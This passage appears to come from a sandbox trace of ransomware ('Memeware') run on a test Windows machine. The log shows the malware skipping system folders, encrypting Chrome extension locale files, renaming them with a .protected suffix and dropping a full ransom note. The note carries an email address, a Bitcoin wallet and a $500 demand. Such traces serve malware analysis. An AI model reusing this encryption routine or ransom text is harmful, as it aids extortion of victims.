Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\messages.json.protected") returned 165 [0080.044] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\messages.json.protected")) returned 1 [0080.045] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.045] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.045] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\RESTORE_FILES.txt") returned 159 [0080.045] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.045] lstrlenA 
(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.045] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.046] lstrlenA (lpString="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") returned 684 [0080.046] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) 
returned 1 [0080.046] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.046] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.046] CloseHandle (hObject=0x164) returned 1 [0080.046] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.046] lstrcmpiW (lpString1="es_419", lpString2="Windows") returned -1 [0080.046] lstrcmpiW (lpString1="es_419", lpString2="Program Files") returned -1 [0080.046] lstrcmpiW (lpString1="es_419", lpString2="Program Files (x86)") returned -1 [0080.046] lstrcmpiW (lpString1="es_419", lpString2="$Recycle.bin") returned 1 [0080.046] lstrcmpiW (lpString1="es_419", lpString2="System Volume Information") returned -1 [0080.046] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419") returned 145 [0080.046] lstrcmpW (lpString1="es_419", lpString2=".") returned 1 [0080.046] lstrcmpW (lpString1="es_419", lpString2="..") returned 1 [0080.046] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\*") returned 147 [0080.046] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\*", lpFindFileData=0x295d930 | out: 
lpFindFileData=0x295d930) returned 0x47bc10 [0080.046] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.047] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.047] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.047] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.047] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.047] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\.") returned 147 [0080.047] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.047] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.047] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.047] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.047] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.047] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.047] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.047] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\..") returned 148 [0080.047] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.047] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.047] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.047] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.047] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.047] lstrcmpiW 
(lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.047] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.047] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.047] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\messages.json") returned 159 [0080.047] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.047] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.047] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.047] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.047] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.048] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\messages.json") returned 159 [0080.048] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.048] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\messages.json") returned 159 [0080.048] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.048] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\messages.json") returned 159 [0080.048] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.048] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xe5, lpOverlapped=0x0) returned 1 [0080.049] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff1b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.049] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xe5, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xe5, lpOverlapped=0x0) returned 1 [0080.049] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.049] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.049] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.049] CloseHandle (hObject=0x168) returned 1 [0080.049] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\messages.json.protected") returned 169 [0080.049] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\messages.json.protected")) returned 1 [0080.050] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.050] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.050] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\RESTORE_FILES.txt") returned 163 [0080.050] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 
0x164 [0080.050] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.050] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.051] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.051] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.051] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.051] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.051] CloseHandle (hObject=0x164) returned 1 [0080.051] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.051] lstrcmpiW (lpString1="et", lpString2="Windows") returned -1 [0080.051] lstrcmpiW (lpString1="et", lpString2="Program Files") returned -1 [0080.051] lstrcmpiW (lpString1="et", lpString2="Program Files (x86)") returned -1 [0080.051] lstrcmpiW (lpString1="et", lpString2="$Recycle.bin") returned 1 [0080.051] lstrcmpiW (lpString1="et", lpString2="System Volume Information") returned -1 [0080.051] wnsprintfW 
(in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et") returned 141 [0080.051] lstrcmpW (lpString1="et", lpString2=".") returned 1 [0080.051] lstrcmpW (lpString1="et", lpString2="..") returned 1 [0080.051] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\*") returned 143 [0080.051] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.051] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.051] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.051] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.051] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.051] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.051] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\.") returned 143 [0080.051] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.051] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.051] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.051] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.051] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.051] 
lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.052] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.052] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\..") returned 144 [0080.052] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.052] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.052] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.052] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.052] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.052] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.052] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.052] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.052] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\messages.json") returned 155 [0080.052] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.052] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.052] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.052] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.052] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.052] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\messages.json") returned 155 [0080.052] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.052] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\messages.json") returned 155 [0080.052] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.052] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\messages.json") returned 155 [0080.052] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.052] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xe2, lpOverlapped=0x0) returned 1 [0080.053] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff1e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.053] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xe2, lpOverlapped=0x0) returned 1 [0080.053] SetFilePointerEx (in: hFile=0x168, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.053] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.053] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.053] CloseHandle (hObject=0x168) returned 1 [0080.053] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\messages.json.protected") returned 165 [0080.054] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\messages.json.protected")) returned 1 [0080.054] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.054] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.054] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: 
